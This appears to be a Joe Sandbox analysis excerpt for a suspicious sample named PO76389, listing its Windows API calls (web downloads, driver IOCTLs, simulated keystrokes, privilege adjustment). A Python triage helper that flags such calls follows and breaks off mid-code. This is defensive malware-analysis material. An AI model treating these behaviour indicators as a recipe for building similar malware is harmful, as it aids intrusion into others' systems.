                                                    • Opcode ID: b4cd720b2cda2a19e6ced3d239d412dfc45693a964dc6a1869c0b5c883111a13
                                                    • Instruction ID: 8cc536ff4ae194f009c094bc73438e6dab20f72657fdc2bc5d81beeaa714c231
                                                    • Opcode Fuzzy Hash: b4cd720b2cda2a19e6ced3d239d412dfc45693a964dc6a1869c0b5c883111a13
                                                    • Instruction Fuzzy Hash: 6241F5B0A0025CAAEF209B65D8057FF7BB5AB95315F04015BF681A23C1CB7C8A859779
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • GetCursorPos.USER32(?), ref: 0051EFE2
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0052F3C3,?,?,?,?,?), ref: 0051EFF7
                                                    • GetCursorPos.USER32(?), ref: 0051F041
                                                    • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0052F3C3,?,?,?), ref: 0051F077
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                    • String ID:
                                                    • API String ID: 1423138444-0
                                                    • Opcode ID: 6b7a965d225fc38835ba19c0596be1114600b5e2bd2f6586ac01924b0c84c374
                                                    • Instruction ID: ab341cb6fd1872f98525b9d2f6ff3195458ddbdf62c33d147c96072760b9558a
                                                    • Opcode Fuzzy Hash: 6b7a965d225fc38835ba19c0596be1114600b5e2bd2f6586ac01924b0c84c374
                                                    • Instruction Fuzzy Hash: 02212335500018EFDB258F59D898EEA7FB5FB09724F044069F90A872A2C3309D91EBA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: G-K
                                                    • API String ID: 0-1269858464
                                                    • Opcode ID: 5bc9e5dc41fcf065211475fe992cdf23a80a20480b91c1248f19eb29484ee0b0
                                                    • Instruction ID: fc3c2c15fe6cf54e4426d22c26510a0e846df279cb9caf151d35a971045180a9
                                                    • Opcode Fuzzy Hash: 5bc9e5dc41fcf065211475fe992cdf23a80a20480b91c1248f19eb29484ee0b0
                                                    • Instruction Fuzzy Hash: A322AC70E052158FDB14DF58C490BFAB7F0FF59304F1480AAE8469B391E779A885CBA9
                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004F221E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: lstrlen
                                                    • String ID: ($|
                                                    • API String ID: 1659193697-1631851259
                                                    • Opcode ID: 3f4f3318245aa13e9d0030713122d56d321a2d2c9a27bef0414175310eb32f96
                                                    • Instruction ID: dd69782e583814b6020d686bf9f3b02deb6b5bf2843785173c9e0afbfe840d83
                                                    • Opcode Fuzzy Hash: 3f4f3318245aa13e9d0030713122d56d321a2d2c9a27bef0414175310eb32f96
                                                    • Instruction Fuzzy Hash: BA323675A007059FC728CF69C580A6AB7F0FF48320B11C46EE59ADB3A1D7B4E941CB48
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 004CAE5E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DialogLongNtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 2065330234-0
                                                    • Opcode ID: 5da798c2f3655d4516191221d96241736ee016fc3e895108d936225c19327aaa
                                                    • Instruction ID: 85105f0f15bc4f7bc609199ac69594c614b05064e83fe97fc201a31f5d048ce6
                                                    • Opcode Fuzzy Hash: 5da798c2f3655d4516191221d96241736ee016fc3e895108d936225c19327aaa
                                                    • Instruction Fuzzy Hash: 32A10C6810411DBADB64AA296C89FBF3D6DFF96348B14453FF402D21D1C51D8C61A3BB
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00504A1E,00000000), ref: 005055FD
                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00505629
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                    • String ID:
                                                    • API String ID: 599397726-0
                                                    • Opcode ID: f4e819cb6f5ff40cbf28e69ab35b805c18c9c271cb561479e9780d00d107f6b5
                                                    • Instruction ID: a1bcb6bd33f0d54d8b91b1aa0059e3f9a7ca82bb71bc1f764538ab369229c2bd
                                                    • Opcode Fuzzy Hash: f4e819cb6f5ff40cbf28e69ab35b805c18c9c271cb561479e9780d00d107f6b5
                                                    • Instruction Fuzzy Hash: BB41C171500A09BFEB109A91DC85FBFBBBDFB80758F10442EF605A62C0FA719E419E64
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 004FEA95
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 004FEAEF
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 004FEB3C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID:
                                                    • API String ID: 1682464887-0
                                                    • Opcode ID: 59ab0f869293d2964e39c33e3b66ed84f612ee9d1091fbed0b8afe149079fd0a
                                                    • Instruction ID: faf0b1c6fbe5461e1a7abf7141929731f0d5012fa4a7755f5ded6eae68565b46
                                                    • Opcode Fuzzy Hash: 59ab0f869293d2964e39c33e3b66ed84f612ee9d1091fbed0b8afe149079fd0a
                                                    • Instruction Fuzzy Hash: 7B217F35A00208EFCB00DFA6D884AEEBBB4FF48314F14809AE505A7351DB759905CB54
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004F704C
                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 004F708D
                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004F7098
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                    • String ID:
                                                    • API String ID: 33631002-0
                                                    • Opcode ID: 332754e47ec70ba6b61ccef73aadf930f5728ab5351e6a2fba1e957b1cac1c1c
                                                    • Instruction ID: 75eb93b7a674d4d2271690b37e7b3af752799af24eff512f6476961235c7e84a
                                                    • Opcode Fuzzy Hash: 332754e47ec70ba6b61ccef73aadf930f5728ab5351e6a2fba1e957b1cac1c1c
                                                    • Instruction Fuzzy Hash: 1E113C71A00228BFEB108BA4EC45AAFBBBCEB45B10F104152FA00E7290D6745A059BA5
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                      • Part of subcall function 004CB155: GetWindowLongW.USER32(?,000000EB), ref: 004CB166
                                                    • GetParent.USER32(?), ref: 0052F4B5
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,004CADDD,?,?,?,00000006,?), ref: 0052F52F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$DialogNtdllParentProc_
                                                    • String ID:
                                                    • API String ID: 314495775-0
                                                    • Opcode ID: 665353b159a5e2802c3d29222b2cbc063adf209f1a85652654f22630b2aea3e1
                                                    • Instruction ID: 70aaf6b49dc8506fdecd5f29a516291d09de56d9ff0d64df95a22e25421538d7
                                                    • Opcode Fuzzy Hash: 665353b159a5e2802c3d29222b2cbc063adf209f1a85652654f22630b2aea3e1
                                                    • Instruction Fuzzy Hash: 1321D539200514AFCB649F29E849FAB3BA2EF06364F18426DF1394B3E2C7345D11E795
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004FFD71
                                                    • FindClose.KERNEL32(00000000), ref: 004FFDA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: 9f0b087fdaf3a613005a7bf48bdf50dd5e15dce2225b4d37507786c0e5582eba
                                                    • Instruction ID: 3ba307f5f602dc2318391a3208ab3182383c1511d4261d261c77ca99c7dc8cb6
                                                    • Opcode Fuzzy Hash: 9f0b087fdaf3a613005a7bf48bdf50dd5e15dce2225b4d37507786c0e5582eba
                                                    • Instruction Fuzzy Hash: C811A1316102059FD700EF29D845A2AF7E8FF84324F00851EF9A59B391DB74EC05CB99
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0052F352,?,?,?), ref: 0051F115
                                                      • Part of subcall function 004CB155: GetWindowLongW.USER32(?,000000EB), ref: 004CB166
                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0051F0FB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                    • String ID:
                                                    • API String ID: 1273190321-0
                                                    • Opcode ID: 2467caedb406f2ddbbb1161dc8441fd27500b8a16ff4be8bde95e1f61c9cf0ce
                                                    • Instruction ID: cdc5f56b5fdcfa3588143705caaf84f1b7c377d0d729a2dd5e1537cb02e6f4de
                                                    • Opcode Fuzzy Hash: 2467caedb406f2ddbbb1161dc8441fd27500b8a16ff4be8bde95e1f61c9cf0ce
                                                    • Instruction Fuzzy Hash: 4901D831204604FBDB219F18EC49FA63FB6FB85364F184528F8150B2E1C7329856EB61
                                                    APIs
                                                    • ClientToScreen.USER32(?,?), ref: 0051F47D
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0052F42E,?,?,?,?,?), ref: 0051F4A6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ClientDialogNtdllProc_Screen
                                                    • String ID:
                                                    • API String ID: 3420055661-0
                                                    • Opcode ID: 780ad96c0dad31bd9ede6fe96b3dff5d65fcbecb6615d1b7ad0fac24d6153d21
                                                    • Instruction ID: ccfb802d65a9ba3edfb279d5bcc3a714952ee9467eaab63eb7c7a3ac550f4b4c
                                                    • Opcode Fuzzy Hash: 780ad96c0dad31bd9ede6fe96b3dff5d65fcbecb6615d1b7ad0fac24d6153d21
                                                    • Instruction Fuzzy Hash: 53F03A72400118FFEF049F95EC099AE7FB8FF54351F10405AFA02A2160D3B5AA55EB60
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0050C2E2,?,?,00000000,?), ref: 004FD73F
                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0050C2E2,?,?,00000000,?), ref: 004FD751
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: 6624a8c4b7d9df03ee7637a381ffedc4933e09d259b4295d3432bb52133fa4c4
                                                    • Instruction ID: 25adeb4a2d2fbaf6a79dacc5a1def1a59d3fb017eb18bd539ff102bc2b1bdba4
                                                    • Opcode Fuzzy Hash: 6624a8c4b7d9df03ee7637a381ffedc4933e09d259b4295d3432bb52133fa4c4
                                                    • Instruction Fuzzy Hash: F5F0E23540032DEBDB10AFA4CC88FEB77BDAF49351F008416B905D6181D274D940DBB4
                                                    APIs
                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 004F4B89
                                                    • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 004F4B9C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: InputSendkeybd_event
                                                    • String ID:
                                                    • API String ID: 3536248340-0
                                                    • Opcode ID: 092b47b44b191ca5a7a33513ee523c8abf7920c12ee4d35d1acc4aa36286586c
                                                    • Instruction ID: b659d86d1eb6a4ba456d598dafd8971103e38cd14e4fc04e2f0064f66a5957b4
                                                    • Opcode Fuzzy Hash: 092b47b44b191ca5a7a33513ee523c8abf7920c12ee4d35d1acc4aa36286586c
                                                    • Instruction Fuzzy Hash: 8DF0907080034DAFDB058FA0C805BBE7BB4EF00305F00840AFD51A6292D779D616EFA4
                                                    APIs
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004EB9EC), ref: 004EB8C5
                                                    • CloseHandle.KERNEL32(?,?,004EB9EC), ref: 004EB8D7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                    • String ID:
                                                    • API String ID: 81990902-0
                                                    • Opcode ID: 14c1f999b5e1e8f36c43bf9444ade2a8ea2484de9cd74726370fa241b0e946de
                                                    • Instruction ID: cff0c150c746e4c50f038c0925a22c16871ca69a26a217c3ae45a6a012a97d47
                                                    • Opcode Fuzzy Hash: 14c1f999b5e1e8f36c43bf9444ade2a8ea2484de9cd74726370fa241b0e946de
                                                    • Instruction Fuzzy Hash: DEE09A71004511AEE7262B51EC0996777FDEF04315B10851AB45581570D7665C94EB64
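Of the function records above, the DeviceIoControl, WinINet (InternetQueryDataAvailable / InternetReadFile), SendInput / keybd_event and AdjustTokenPrivileges entries are the ones a triage analyst pulls out first. The Python below is an added helper written for this page; it is not part of the Joe Sandbox report or of the sample. It parses the "• API.MODULE(args), ref: addr" lines exactly as the report prints them (a constructed sample built from the lines above is embedded), decodes the raw IOCTL in the DeviceIoControl record using the Windows CTL_CODE bit layout, and tags the calls worth a second look. The tag table and the one-entry IOCTL name map are the editor's own assumptions, not report data.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: API lines copied from the function records on this
# page, plus one "Part of subcall function" line to exercise that form.
SAMPLE_API_LINES = """\
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004F704C
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 004F708D
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004F7098
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00504A1E,00000000), ref: 005055FD
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00505629
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 004F4B89
• keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 004F4B9C
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004EB9EC), ref: 004EB8C5
  • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
"""

# One report line: optional "Part of subcall function XXXX:" prefix, then API.MODULE(args), ref: addr
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                        # call-site address from the "ref:" field
    args: list                      # int per argument, None where the report shows '?'
    parent: Optional[int] = None    # set for "Part of subcall function" lines


def parse_api_lines(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [None if a == "?" else int(a, 16) for a in m["args"].split(",") if a]
        parent = int(m["parent"], 16) if m["parent"] else None
        calls.append(ApiCall(m["api"], m["module"], int(m["ref"], 16), args, parent))
    return calls


# CTL_CODE(DeviceType, Function, Method, Access) = DeviceType<<16 | Access<<14 | Function<<2 | Method
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
# Assumed name map (editor's own, one entry): FILE_DEVICE_MASS_STORAGE (0x2D), function 0x500, buffered.
IOCTL_NAMES = {0x2D1400: "IOCTL_STORAGE_QUERY_PROPERTY"}


def decode_ioctl(code: int) -> dict:
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "name": IOCTL_NAMES.get(code),
    }


# Assumed triage tags (editor's own choice of what to surface first).
TRIAGE_TAGS = {
    "DeviceIoControl": "direct driver communication",
    "InternetQueryDataAvailable": "HTTP download via WinINet",
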